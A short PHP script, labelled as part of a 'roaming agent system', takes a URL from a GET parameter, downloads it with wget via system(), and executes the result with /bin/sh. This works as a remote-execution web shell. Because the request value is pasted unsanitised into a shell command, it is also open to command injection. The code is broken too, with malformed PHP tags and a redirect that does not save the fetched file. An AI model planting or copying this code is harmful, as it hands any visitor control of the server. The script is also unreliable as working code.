<%php
#
# PART OF A ROAMING AGENT SYSTEM
#
# AUTHOR: MATTHEW WILLIAM COAN
# DATE: FRI DEC 4, 2009
#

$agent = $HTTP_GET_VARS["agent"];

if($agent != null) {
   system("wget \"" . $agent . "\" > ./the_agent.txt");

   system("/bin/sh ./the_agent.txt");
}

php?>
